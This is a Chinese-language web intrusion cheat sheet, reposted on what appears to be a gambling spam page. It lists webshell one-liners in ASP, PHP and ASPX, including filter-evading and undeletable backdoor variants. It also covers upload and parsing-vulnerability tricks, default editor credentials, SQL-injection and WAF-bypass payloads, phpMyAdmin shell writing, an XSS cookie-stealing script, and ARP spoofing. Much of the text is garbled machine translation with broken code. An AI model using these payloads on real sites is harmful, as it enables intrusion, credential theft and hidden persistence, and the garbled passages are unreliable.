新闻

当前位置:手机版美高梅网站 > 新闻 > 网址个人渗透本事采撷与计算,主流网站程序O

网址个人渗透本事采撷与计算,主流网站程序O

来源:http://www.best-sclae.com 作者:手机版美高梅网站 时间:2019-11-14 17:45

1.接受网址过滤不严直接绕过后台验证,在网址背后加上 admin/session.asp 或 admin/left.asp

手机版美高梅网站 1

2.有的网站进后台会合世八个本子提醒框,输入:administrator 就能够突破!admin代表以管理员身份步入的意趣。

版权和内容表明:

那篇小说不是本站编写,是从网络上摘抄的,可是经过了本站的改写优化,并将内容,格式标准化。

本篇表明:那篇小说结合了长辈们2018年一齐开刨出来的主流程序漏洞以至思路, 小编写在前方是想让大家大概通晓一下,因为《渗透学科》以后的内容,就是围绕着本篇所关联的剧情开展深度逻辑原领悟析。

那是风流潇洒篇相比完全的基本渗透笔记。看不懂不妨,前面会挨个讲授可是本章的剧情读者们要硬着头皮保存,可能会在拿站的时候利用到啊!

3.有的网址开了3389,凌犯此前先去老是3389,尝试弱口令或是爆破,再者正是按5次shift键,看看有没前人装过后门,然后再社会群众工作密码。

经常见到网址程序asp类:

foosun(风讯)

kesion(科汛)

newasp(新云)

乔客CreateLive(创力)

5uCMSKingCMS

DvBBS(动网)

BBSxp[博客]zblog

4.不常候进后台会弹出提示框“请登录”,把地点抄写出来(复制不了卡塔尔国,然后放在网页源代码深入分析器里,选取浏览器-拦截跳转勾选–查看就可以步向后台!

PHP类:

DeDeCms(织梦)

ECMS(帝国)

PHPCMS

PHP168

HBcms(宏博)SupeSite

CMSware(思维)Joomla!

[BBS]Discuz!

[BBS]phpWind[SNS]UCenterHome

[SNS]ThinkSNS[商城]EcShop

[商城]ShopEx[博客]WordPress

[维基]HDWiki

[微博]PHPsay[DIGG]PBdigg

5.突破防盗链访问webshell,代码:

PHP程序来源私下认可相对路线

开源系统 数据库配置文件名 文件名所在的目录

Discuz! config.inc.php ./ config.inc.php

Phpcms config.inc.php ./include/config.inc.php

Wodpress wp-config.php ./ wp-config.php

Phpwind sqlconfig.php ./data/sqlconfig.php

phpweb config.inc.php ./config.inc.php

Php168v6 mysql_config.php ./php168/ mysql_config.php

Shopex config.php ./config/config.php

Ecshop config.php ./data/config.php

Joomla configuration.php ./ configuration.php

UCenter config.inc.php ./data/config.inc.php

EmpireCMS config.php ./e/class/config.php

Dedecms common.inc.php .data/common.inc.php

Zen Cart configure.php ./includes/configure.php

Mediawiki localsettints.php ./config/localsettints.php

Ecshop config.php ./data/config.php

osCommerce configure.php ./includes/configure.php

 

【 Google语法 】

site:能够约束你搜索范围的域名.

inurl:用于寻觅网页上带有的UWranglerL,那几个语法对搜索网页上的搜求,扶植之类的很有用.

intext: 只寻找网页部分中带有的文字(也等于忽略了标题、U揽胜极光L等的文字)

intitle: 查包罗关键词的页面,日常用来社工别人的webshell密码

filetype:寻觅文件的后缀或然扩大名

intitle:节制你寻觅的网页标题.

link: 能够获取一个颇负包罗了有个别钦命UENCOREL的页面列表.

探寻后台地址:site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms

追寻文本内容:site:域名 intext:管理|后台|登录|客商名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username

检索可注入点:site:域名 inurl:aspx|jsp|php|asp

探寻上传漏洞:site:域名 inurl:file|load|editor|Files

找eweb编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit

留存的数据库:site:域名 filetype:mdb|asp|#

翻看脚本类型:site:域名 filetype:asp/aspx/php/jsp

迂回战术入侵:inurl:cms/data/templatesindex/

网络设施根本词:intext:WEB Management Interface for H3C SecPath Series

javascript:document.write("<a href='http://www.xxx.com/uploadfile/1.asp'>fuck</a>")

【 一句话木马 】

asp一句话木马:<%eval request(“x”)%>

php一句话木马:

aspx一句话:<%@ Page Language=”Jscript”%><%eval(Request.Item[“x”],”unsafe”);%>
网址配置、版权音信专项使用一句话:”%><%Eval Request(x)%>

一句话再过护卫神:<%Y=request(“x”)%> <%execute(Y)%>

过拦截一句话木马:<% eXEcGlOBaL ReQuEsT(“x”) %>

asp闭合型一句话 %><%eval request(“0o1Znz1ow”)%><%

能过安全狗的拆解解析格式:;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg

突破安全狗的一句话:<%Y=request(“x”)%> <%eval(Y)%>

elong过安全狗的php一句话:

后台常用写入php一句话(密码x卡塔 尔(阿拉伯语:قطر‎:

<?
$fp = @fopen(“c.php”, ‘a’);
@fwrite($fp, ‘<‘.’?php’.”rnrn”.’eval($_POST[x])’.”rnrn?”.”>rn”);
@fclose($fp);
?>

高强度php一句话:

风行变异PHP一句话(密码b4dboy):
($b4dboy = $_POST[‘b4dboy’]) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);

突破安全狗的aspx一句话:<%@ Page Language=”C#” ValidateRequest=”false” %>

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“你的密码”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

突破护卫神,爱戴盾一句话:

无数网页程序都不允许包罗〈%%〉标记符号的内容的文件上传,这样一句话木马就写入不进数据库了。
改成:〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script〉
如此就逃匿了应用〈%%〉,保存为.ASP,程序依旧实行的效果是如出黄金年代辙的。

PHP高强度一句话:
菜刀连接:/x.php?x=lostwolf 脚本类型:php 密码:c
菜刀连接 规避检查测量检验 密码:c

 

【 拆解深入分析漏洞计算 】

IIS 6.0

目录深入分析:/xx.asp/xx.jpg xx.jpg可替换为随机文本文件(e.g. xx.txt),文本内容为后门代码IIS6.0 会将 xx.jpg 拆解解析为 asp 文件。

后缀分析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包更改文件名)
IIS6.0 都会把该类后缀文件成功深入深入分析为 asp 文件。

私下认可深入剖析:/xx.asa /xx.cer /xx.cdx
IIS6.0 暗许的可实践文件除了 asp 还含有那三种
这里可联系利用目录深入分析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg
IIS 7.0/ IIS 7.5/ Nginx <8.03
在暗中同意法斯特-CGI开启境况下,在叁个文本路径(/xx.jpg)前边加上/xx.php会将 /xx.jpg/xx.php 深入分析为 php 文件。

常用利用格局: 将一张图和三个写入后门代码的文本文件归总将恶意文本写入图片的二进制代码之后,制止毁坏图片文件头和尾
e.g.
copy xx.jpg/b + yy.txt/a xy.jpg
/b 即二进制[binary]模式
/a 即ascii格局 xx.jpg平常图片文件
yy.txt 内容 ’);?>
意思为写入二个剧情为 名为shell.php的文件
找个地点上传 xy.jpg ,然后找到 xy.jpg 之处,在地点后拉长 /xx.php 就能够实施恶意文本。
.然后就在图纸目录下生成一句话木马 shell.php 密码 cmd

回车的后边点击GO就可以进入webshell

【 ewebeditor编辑器 】

默许后台:ewebeditor/admin_login.asp

帐号密码:admin admin

体制设计:ewebeditor/admin_style.asp

翻开版本:ewebeditor/dialog/about.html

数据库路线:db/ewebeditor.mdb db/%23ewebeditor.mdb db/%23ewebeditor.asp ewebeditor/db/!@#ewebeditor.asp (用谷歌(Google卡塔 尔(英语:State of Qatar)语法找文件名)

手机版美高梅网站,遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =../..

跳转目录:ewebeditor/admin_uoloadfile.asp?id=14&dir=.. (dir为列目录, ..为回去上层目录),方式:dir ../..
点上传文件管理-随意接纳一个样式目录,获得:ewindoweditor/admin_uoloadfile.asp?id=14 在id=14背后加&dir=../../../.. 就可观望全数网址的公文了(../本身加减)

6.突破超级音信监控拦截系统访谈,当小马可(英文名:mǎ kě卡塔 尔(英语:State of Qatar)以访谈,上传大马却万分的时候,能够先用马拉西亚跟一张图片归总,在上传归并后的图纸,接着数据库备份后拜候就能够!

( ewebeditor5.5版本 )

暗许后台:ewebeditor/admin/login.asp

帐号密码:admin 一九九零25

数据库路线:data/%23sze7xiaohu.mdb

遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../

调用样式上传页面:ewebeditor/ewebeditor.htm?id=body&style=popup
( ewebeditor3.8 php版本 )

暗中同意后台:eWebEditor/admin/login.php
率先随意输入一个帐号和密码,接着系统会提醒出错,这个时候清空浏览器的url,然后输入以下代码后连按一次回车键:
javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”));
进而访谈文件:ewebeditor/admin/default.php 就足以平昔进去后台了。

7.在拿编辑器的shell时,有时扩充了asp|asa|cer|php|aspx等扩张名上传时都被过滤了,其实只要扩展aaspsp 上传asp就能够突破了。

( ewebeditor编辑器exp手册 )

神蹟什么后缀都上传了,依旧要命。就充实三个asp:jpg格式 上传asp:jpg 试试

豆蔻梢头:文件上传成功了,可是访谈不成功,表达该目录(比如:/UploadFile)被设置了权力,重返去换到/ 上传播根目录就行了.增添asp等非常的时候,可以选拔拆解剖析asp;jpg

二:下载数据库查看前人留下的划痕,再拜谒上传页面拿shell。

页面路线:/ewebeditor.asp?id=48&style=popu7 用工具浏览数据库找到已增加asp|asa|cer|php的栏目,把S_ID跟S_Name的值替换在言辞里拜望,上传相对应的格式木马。

8.偶然啊D猜出表段了,可是猜不到字段的时候,能够到后台查看源文件,找出ID或type,日常都能找到,再到啊D里增加字段进展猜解内容就能够突破。

【 fckeditor编辑器 】

翻看版本:fckeditor/editor/dialog/fck_about.html

编辑器页面:FCKeditor/_samples/default.html

上传页面:fckeditor/editor/filemanager/connectors/test.html

遍历目录:FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/

编辑页面:fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

翻看文件上传路线:fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=

9.社工后台密码能够用那么些本领,要是网址域名是:exehack.Net 助理馆员名字为admin,能够尝试密码“exehack”和“exehack.net”来登入。

( 拿shell方法计算 )

ASPX的站大约都用fck编辑器,建议用工具扫一下,记住inc目录下大概存在fck编辑器,扫下这一个目录。

风姿洒脱:假诺是iis6.0,上传五回 1.asp;.jpg 大概1.asp;1.jpg 大概成立x.asp目录,再在这里个目录下上传x.jpg 也许间接上传1.asp;jpg 都得以康健深入解析砍下shell

二:第三遍上传1.asp;1.jpg,被重命名称为:1_asp;1.jpg,可是第三次上传1.asp;1.jpg,就有十分大只怕产生:1.asp;1(1).jpg

三:iis7.5+fck的深入分析文件为:a.aspx.a;.a.aspx.jpg..jpg.aspx

四:倘诺不是iis6.0 上传1.asp;jpg然后抓包,接下去改包,将分店形成空格,再用c32把20改成00,保存,利用%00 截断分号四回

五:成功访问外人的一句话木马页面, 但不驾驭密码
那一个是图表木马,未有得逞选取iis6.0深入分析漏洞依旧图片,下载下来用记事本展开找到密码。

六:IIS7.0/7.5 通杀oday,把php一句话木马后缀改成1.jpg传上去,寻觅一句话的门路后,在1.jpg的前面增多/.php 举例:
( 建设构造文件夹 . 变 _ 的突破艺术 )
接纳Fiddler web debugger 那款工具来张开改良数据包,从而到达突破的目标。
只顾:安装Fiddler web debugger,须要安装.net碰到以至.net的SP2补丁方可运转!

1.开采fck的上传页面,例如:fckeditor/editor/filemanager/browser/default/connectors/test.html

2.再打开Fiddler web debugger那款工具,点击设置–自动断点–选取 “央求此前”

3.跟着展开fck的上传页面,创造文件夹,并输入你想要创设的文书名,举个例子:x.asp

4.然后回来到Fiddler web debugger那款工具里,选择链接–点击右边的嗅探

5.修正currentfolder内的参数,改成你要树立的文件夹名字,如:x.asp

6.然后点击右边的:run to completion

7.再点击软件安装–自动断点–禁止使用,再到浏览器里点击鲜明创设文件夹,你就能够意识文件夹建设构造为x.asp了

10.手工业流入时假使网址过滤了 and 1=1   and 1=2 ,能够用xor 1=1   xor 1=2 实行判别。

【 linux 】

深入深入分析格式:1.php.xxx (xxx能够是专断)
借使apache不认知后缀为rar的文件,大家就用1.php.rar格式上传,文件就能够被服务器用作PHP脚本深入分析。

鉴定识别linux系统方法:举个例子: 把b换来大写B访谈,假若出错了,就证实是linux系统,反之是windows系统.

11.本地构造上传一句话木马,假使提醒“请先选拔你要上传的文本![ 重新上传 ]” ,表明文件太小了,用记事本张开再复制多几句话进而增加文件大小,再上传就能够。

【 旁注 】

旁注的技能正是采取支持aspx的站来日,那样提权时候希望一点都不小,怎么样探测服务器上什么样站点援助aspx呢? 利用bing找出: 寻觅格式:ip:服务器ip aspx
比方要入侵八个网址,想精通该网站支不接济aspx,就在网址背后随便加上叁个xxx.aspx回车,假使展现的不是iis私下认可的荒谬页面,而是这种:“/”应用程序中的服务器错误,表明辅助aspx马。

12.用啊d跑表,跑字段名name和pass出不来,呈现长度抢先50哪些的,猜解不出的状态下,这个时候放在穿山甲(学名:Manis pentadactyla卡塔 尔(英语:State of Qatar)去跑日常都能跑出去!

【 phpmyadmin 】

翻开版本:test.php 或 phpinfo.php

默许账号密码:root root

万能帐号密码:’localhost’@’@” 密码空

拿shell第风流倜傥种办法:
CREATE TABLE mysql.darkmoon (darkmoon1 TEXT NOT NULL );
INSERT INTO mysql.darkmoon (darkmoon1 ) VALUES (‘’);
SELECT darkmoon1 FROM darkmoon INTO OUTFILE ‘d:/wamp/www/darkmoon.php’;
DROP TABLE IF EXISTS darkmoon;

拿shell第三种格局:
Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES(‘’);
select darkmoon from moon into outfile ‘d:/wamp/www/darkmoon2.php’;
Drop TABLE IF EXISTS moon;

拿shell第二种办法:
select ‘’INTO OUTFILE ‘d:/wamp/www/darkmoon3.php’

拿shell第多样情势
select ‘’ INTO OUTFILE ‘d:/wamp/www/darkmoon4.php’
127.0.0.1/darkmoon4.php?cmd=net user

找到mysql数据库,实行sql语句就能够写入一句话,再菜刀连接就可以。

13.猜组织者后台小手艺,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp 会现出菜单导航,然后迅雷下载全部链接。

phpmyadmin脱裤

在那之中是足以一向拖库的,就像是上传php拖库脚本同样,操作差不离的。
校订mysql暗中同意的root客户名艺术:
进入phpmyadmin,进入mysql表,执行sql语句

1.update user set user=’你的新root用户名’ where user=’root’;

2.flush privileges;
例如:
用root身份登陆,步入mysql库,更正user表就能够。

1.use mysql;

2.mysql>update user set user=’newName’ where user=’root’;

3.mysql> flush privileges;

14.亮堂表名,字段,使用SQL语句在ACCESS数据库中加个顾客名及密码语句:

【 万能密码 】

( php )
帐号:’ UNION Select 1,1,1 FROM admin Where ”=’
密码:1

( asp )

‘xor

‘or’=’or’
‘or”=”or”=’
‘or ‘1’=’1’or ‘1’=’1
‘or 1=1/*

Insert into admin(user,pwd) values('test','test')

【 批量关键词 】

inurl:asp?id=

inurl:detail.php?

CompHonorBig.asp?id= 很正确的的叁个搜寻注入点

inurl:show.asp? 极其刚劲

site:www.yuming.com

inurl:articleshow.asp?articleid=数字

inurl:szwyadmin/login.asp

inurl:asp?id=1 intitle:政府

杭州 inurl:Article_Class2.asp?

 

15.当赢得管理员密码,却拿不到管理员的帐号时,到前台随意展开一个音讯,找找诸如“提交者”“公布者”之类的单词,日常“提交者”正是协会者的帐号了。

【 木马后门 】

1.TNTHK小组内部版 —— 存在重大词后门,随意输入三个错的密码,右键查看源文件,找到错误重要词后边的font,在font前边的正是科学密码。

2.不灭之魂—不死丧尸变种 —— 用那款工具特地爆那款马来西亚的密码:爆不灭之魂密码

3.终极防删免杀多职能VIP版本-无后门 —— 万能密码:wbgz 菜刀连接:kk

16.爆破ASP+IIS架设的网址web相对路线,要是网址主页为: 提交

【 安全狗 】

17.源码的使用,超级多网址用的都以英特网下载的源码,有的站长很懒,什么也不改,然后就上传开通网址了,大家能够去下载生机勃勃套,里面有为数不菲暗中同意的音信值得利用。

1.过注入

方法一:a.asp?aaa=%00&id=sql语句

方法二: a.asp?id=sql语句 里面把平安过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin

18.把以下代码上传到webshell里,后缀是asp,固然外人开采了也删除不了,算是一流防删的一句话木马了,能够很安全的留个后门,菜刀连接密码:x

2.过马来西亚被拦住访谈

主意少年老成:上传叁个马拉西亚 然后拜见 ; 访谈前边世拦住。
那么化解方法 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!–#include file=”dama.jpg” –> 这样再拜会da.asp 就不会被拦截了。

<%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>

3.过菜刀连接一句话被挡住

办法风流洒脱:不用菜刀连接一句话,用其余一句话连接端。

方式二:中间转播下延续菜刀,把过滤掉的词替换掉。

19.当破解出帐号密码却找不到后台的时候,可以尝试链接ftp,要是域名是:www.baidu.com “ 获得的密码为“bishi”,大家就足以试下用“xxxx”“xxxx.cn”www.xxxx.cn作为FTP 客户名,用“bishi”:作为FTP密码来张开登入,成功的可能率得以一点都不小的啊!ftp的私下认可端口:21  暗许帐号密码:test

【 本地构造上传漏洞 】

找出程序上传漏洞,必需从上传页面包车型地铁源文件入手,目的有八个:

1.filename (文件名称) 在上传页面中针对文件增添名过滤不严,进而上传可推行的脚本木马。

2.filepath (文件路线) 在上传页面针对路线过滤不严,招致可以修改上传绝对路线上传脚本木马。

当检查实验到多少个上传页面,asp、asa后缀已经被过滤掉的时候,能够品尝抓包明小子或NC上传!

可怜就接纳本地上传漏洞构造上传!比方上传页面是:

1.右键查看源文件,找到这段代码:

把上述代码中actino处的渠道补全!即:

 

 

2.再找到这段代码:

选择IIS6.0拆解解析漏洞,把上述代码中value处的文件补全!即: 注意:冒号后边有空格!

3.随着保存为1.html,将刚保存的文书拖进去C32里,采纳十四进制情势,找到“1.asa; ”后边的空格,将其填写为00后保存退出!

4.地方展开上传图片格式的木马(不成功时能够品尝上传一句话木马) ,如若提醒成功后不出示路线的话,能够右键查看源文件自个儿手工业找寻路线访谈就能够!

20.有的后台不出示验证码,难道就没办法登入了么? 其实把生龙活虎段代码导入注册表里就可以突破那个困境了,把下部的代码保存为Code.reg,双击导入就足以了!

【 利用双文件上传拿shell 】

因为网址只看清三回,假设第多少个文本后缀是在白名单里面包车型大巴话,就让其上传,并从未看清第3个文件,所以上传任性子式的文书也让其通过。

当系统验证cookie的时候,就要用到火狐浏览器了,登录网址进后台,让火狐浏览器保存管理员的cookie值,再把改良后的“双文件上传工具”拖进去上传。

1.在后台找上传点,右键查看源文件,找到上传地址,日常在post或action的左近,寻觅就可以找到,平时为:src=”../xxx.htm” 之后补全路线访谈。

2.以此还不是真的的上传页面,真正的上传页面后缀是asp的,继续查看源代码,找到action=”xxx.asp”,补全路径访谈就能够!

4.其实也足以抓包进而获得上传路线,抓包之后,在Referer:这栏,还恐怕有遍布的是:htto://www.xxxx.com/upfile_other.asp

3.开发双文书上传工具,替换为日前的上传地址,保存后拖进火狐浏览器里,第二个筛选jpg木马,第三个选取cer木马,提交后右键查看源文件寻找路线就可以。

REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSecurity]
"BlockXBM"=dword:00000000

【 数据库备份抓包改包NC提交拿shell 】

当备份路线不能够改改,后缀又是mdb不改变的时候,我们可先对备份的历程实行抓包,再本地构造用NC提交就能够突破备份,数据库恢复生机也可使用此措施!

在抓包的时候,最棒用火狐浏览器,因为一些浏览器抓不到包,首先上传一张图片木马复制下地址,接着对备份进程进展抓包!把抓到的数量复制在文件里面!

起来当地校勘,先把POST处补全网站,找到最上面包车型客车少年老成行数据,再复制多大器晚成行比较长度举办改换,把备份的数目名称替换为木马地址,备份的称谓改为投机想要的asp后缀!
再将本来的数目长度跟今后的相持统一起不常候替换掉,最终看黄金时代共扩充了稍微个字符,就在Content-Length:处举行增减,用NC提交数据格式:nc 域名 80<1.txt

21.当网站不允许上传 asp、asa、php等公事时,大家得以上传二个stm文件,代码为:

【 本地构造数据库备份突破拿shell 】

当上传jpg木马获得路线前去备份时,开掘数目库备功能用持续的情事下,能够尝试本地构造突破拿shell!

第风姿洒脱查看源文件,找到“当前数据库路线”校勘为刚上传jpg木马的不二等秘书技,再找到“数据库备份名称”更改为1.asa
找到“

“将路线补全”

 

最终保存为1.html,有的网址不验证cookie的话,直接展开进行备份就可以幸不辱命了,可是平日都要求验证cookie,此时就用上火狐浏览器了。

 

因为火狐浏览器有保留cookie的意义,首先登场入后台,以管理员的权力举行上传,直接把1.html拖进火狐浏览器里,直接点击备份就可以突破cookie验证!

“<!--#include file=”conn.asp”-->”

【 本地构造节制上传类型漏洞 】

平常用于直接扫到的上传页面,名称是:上传图片,上传asp、asa等剧本时提示“请接纳jpg或gif文件!”
那个时候通过那个法子日常都能学有所成,首先保存到本地1.asp 放到小旋风的目录下,然后找到以下这段代码:
alert(“请点击浏览按键,选用你要上传的jpg或gif文件!”)
myform.file1.focus;
return (false);
}
else
{
str= myform.file1.value;
strs=str.toLowerCase();
lens=strs.length;
extname=strs.substring(lens-4,lens);
if(extname!=”.jpg” && extname!=”.gif”)
{
alert(“请选择jpg或gif文件!”);
来看那句代码:if(extname!=”.jpg” && extname!=”.gif”) 改为: if(extname!=”.jpg” && extname!=”.gif” && extname!=”.asp”)

下一场补充完整上传地址,action=这里,然后网页打开127.0.0.1 直接上传asp文件就足以了。

(想查看什么文件就写什么文件名,这里本身假设想查看“conn.asp”),
接下来直接张开那个stm文件的地址,再查看源代码,“conn.asp”那个文件的代码就旗帜显明了!

【 抓包改包NC提交拿shell 】

1.抓包数据中风流倜傥经存在name=”filepath”或是name=”filename”,那么就足以满意NC的上传条件了。

2.将木马的抓包数据复制到文本文件中。举例:1.txt

3.将路线补全:
filepath截断法:
uploadfile/路径后加多1.asp空格 (16进制上边将20改为00)

filename自定义名称:
C:Documents and Settingslei桌面1.jpg (将1.jpg 改为 1.asp空格,16进制下将20改为00)

3.在Content-Length处加上../uploadfile/后扩张的字节数。

4.用C32将空格的20改为00,保存为1.txt。

5.把1.txt跟nc.exe放在同等目录下,cmd命令:nc -vv www.XXXX.com 80<1.txt
( 假如上传成功后尚未将木马拆解剖析成asp,能够尝尝将文件名改成asa、cer、php 再非常就用IIS 6.0解析漏洞,将文件名改为1.asa;1.jpg )

22.当网址不容许上传ASP,CGI,CEEscort,CDX,HT君越等品类的文本时,尝试上传一个shtm文件,内容为:

【 抓包nc上传获取管理权限 】

其后生可畏办法也正是cookie欺诈,首先到前台去注册多个会员,注册成功后在登入的那一刻,用抓包工具举行抓包,把抓到的数目复制到1.txt里面。

接下去展开,把双引号里棉的多寡“X-Forwarded-For: 127.0.0.2’,group_id = 1 where loginname = ‘会员的帐号’#” 放在Content-Length:的下面。

在见到最下边包车型地铁loginname=那行代码,把最后面包车型大巴验证码改成当下会员登入的验证码,然后将nc1.txt 放在同三个索引下,cmd命令:nc 域名 80采撷服务器IP风流倜傥项->在路由追踪生龙活虎项废除全数->分明。

设置甘休后点击一下激动开关(中间那个),再点击嗅探器,点击加号符号,选取具备在子网主机,选用ARP测试(传播 31-位),确定。
扫描甘休选取网关大器晚成项,点击ARP,点击加号符号,左边接收网关,右侧选取任何的C段,分明,点击在此之前嗅探开关(第多少个),嗅探到的帐号密码在口令生机勃勃项表现!

假如开掘非常少年足球以选择幻境网盾来限定网速,让cain的发包跨过防火墙

<!--#includ file="conn.asp"-->

【 arp欺骗 】

只要该服务器存在C段,都足以品味arp棍骗,用到的工具是NetFuke,想领悟arp劫持能或不可能成功,cmd命令:arp -a 看一下,动态的服务器IP就会打响,静态的就不能够。

安装完运转主要调控端,设置–嗅探设置–网卡接纳服务器的IP–调节选项选拔“启用ARP欺骗、启用过滤器、启用剖判器、启用改正器、主动转载” 分明。

设置–ARP欺骗–双向棍骗–来源Ip填服务器的网关–中间人IP填服务器的IP–目的IP填要欺骗的任性C段ip(用御剑扫描C段)–确定。

插件管理–改过器–最终三个精选双击–在左边的HTML Body = [haha!!] 填写自身要展现的文字,点击开首就可以诈欺成功!

  

【 突破安全狗防注入及上传 】

写入webshell 写不进去,常常的一句话 也失效,用这段代码:
<%@ Page Language=”C#” ValidateRequest=”false” %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“admin163.net”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>
连年端用cncert的aspx一句话顾客端

2、IIS6.0拆解深入分析漏洞蒙受安全狗
文本名称叫
如此那般的会被IIS安全狗果断屏蔽
改成如下名称,IIS6同样会解析:
www.baicai.com/;1.asp;1.jpg

3、安全狗的注入绕过
常用的如baicai.asp?id=1 and 1=1 是会被安全狗屏蔽的。

但这样就足以突破了:
baicai.asp?0day5.com=%00.&id=69%20 and 1=1

黄金时代经上传成功,这太好了,访问地址就足以浏览conn.asp里的剧情了,那样一来,数据库路线也就到手啊!

【 跨站xss 】

在网址留言也许能输入音信的地点付出跨站代码,进而盗走助理馆员cookie,然后用cookie浏览器直接步向后台,将以下代码保存为asp文件,比如1.asp<% thisfile=Server.MapPath(“cookie.txt”) msg=Request(“msg”) set fs=server.CreateObject(“scripting.filesystemobject”) set thisfile=fs.OpenTextFile(thisfile,8,True,0) thisfile.WriteLine(“=======cookie:”&msg&”======by:剑眉壮士”) thisfile.close set fs=nothing %>

首先搭建二个asp情形,推荐应用“ASP服务器(解脱安装IIS卡塔尔国” 再将1.asp放在wwwroot目录下,访谈1.asp文件借使提醒下载,则表明搭建设成功了。

下一场在留言板的“您的网址”一处输入:
当助理馆员浏览大家提交的留言时,将要wwwroot目录下生成二个cookie.txt文件,那个时候大家假诺访问cookie.txt那么些文件,就能够掌理员的cookie是不怎么了!

下一场再使用衡阳红军的cookie棍骗工具或是网页源代码查看剖析器,访问网址再输入cookie举行坑绷拐骗登入就可以!(填cookei的时候记得选取自定义卡塔 尔(英语:State of Qatar)
小技巧:要想让管理员早点浏览你提交的留言,能够因此通话,QQ客服等去社工他即可。

23.手工业检测注入点弹出“你的操作已被记录!”之类的音讯,访谈那个文件:sqlin.asp,如若存在,在注入点后边植入一句话木马:
‘excute(request(“TNT”))
从而用一句话木马客户端连接:

【 爆库 】

%5C为十四进制的符号,而数据库大于5.0就可以爆库,若一个网址数据库大于5.0,且是ACESS数据库,若不能够注入的注入点是:
咱们一直把%5C加到rpc前边,因为%5C是爆二级目录,所以应当是那般,
而%23是代表#,若是管理员为了堤防旁人违规下载数据库,而把数据库改成#database.mdb,那样防备了。

要是页面地址为: ; 把%23替换#就足以下载了,即:
还应该有使用私下认可的数据库路线 后边加上 conn.asp 若无改动暗中认可的数据库路径,也得以赢得数据库的路径(注意:这里的/也要换到%5c卡塔尔

如若你能看见:’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是二个实用的门道。 分明路线名称拼写是还是不是科学,以至是不是连接到文件寄放的服务器。
那般的正是数据库了。下载时用FLASHGET换来.MDB格式的就能够.

24.旁注的话,料定是挑帮衬aspx的站点来日了,难题是怎么样推断呢?方法很简单,在在网址背后加上xxx.aspx,假如回到“/”应用程序中的服务器错误,不可能找到该能源,404画面就认证帮忙aspx木马。

【 利用sql注入点推断网址和数据库是或不是站库抽离 】

在注入点后增进:and exists(select * from admin where 1=(Select (case when host_name()=@@servername then 1 else 0 end)))

瞩目admin一定若是存在的表段,若是回去平时,表达网址和数据库是在同等服务器,假如不健康则注解是站库抽离的。

25.网址前面加test.php 能够查看版本

【 iis6.0 PUT写入漏洞 】

使用工具:IIS PUT Scaner、黄冈红军IIS写权限制行驶使程序

1、IIS三沙客户对网址文件夹有写入权限

2、web服务器增添力设置webDAV为允许,即:WebDAV—打勾

3、网址主目录:写入—打勾(可PUT)

4、网址主目录:脚本能源访谈—打勾(可COPY、MOVE卡塔尔

世家都驾驭,写权限正是同意PUT,与网址自己运维的权柄无丝毫关系,倘使展开了,正是从未一点安全意识,就给我们提供了大大的方便。

率先用御剑工具扫下C段,举个例子:12.12.12.1 – 12.12.12.255 展开IIS PUT Scaner,把12.12.12.1放在Start IP 这里,12.12.12.255放在End IP 这里,

接着在Port这里,换到80,点击Scan开端嗅探,当PUT这里突显是Yes就表明存在破绽,能够右键接收PUT file,输入文件名1.txt,上边填内容,保存就足以写入了。
只怕利用“潮州红军IIS写权限制行驶使程序”也足以,那款工具比较强硬,把域名填写进去,比方:www.xxx.com,然后在倡议文件这里输入你的文件名,

在多少包格式这里接受PUT,有的会一向弹出浏览文件框,未有就和好筛选,在上边,然后点击提交数据库就可以,平常是先PUT多个txt文件,再MOVE成asp木马。

26.大忌那四个网址后台文件 admin_index.asp  manage_login.asp

一向交给asp木马的话,假诺MOVE方法充足,能够试试Copy。

 

【 ACCESS奉行SQL语句导出一句话拿webshell 】

原理大概和php网址的outfile大致,在access后台其余措施无法拿到webshell,但是后台有SQL语句询问实行,就足以直接access导出一句话拿webshell了。不过要求领悟物理路线工夫导出,利用IIS的深入分析漏洞导出EXCEL文件得到webshell,因为ACCESS数据库不容许导出其余危急格式,大家导出为EXCEL后在行使IIS拆解解析漏洞就能够成为我们的木马了。
点“服务器新闻探测”,拿到网址路线:e:webwebshellcc的EXCEL 点“系统一管理理”-》“自定义实行SQL”,试一下,能够实践的话能够用access导一句话砍下shell。
create table cmd (a varchar(50)) 创设一个有二个A字段的表 表名叫cmd 字段类型为字符 长度为50
insert into cmd (a) values (‘<%execute request(chr(35))%>’) 在表cmd的a字段插入密码为#的一句话木马
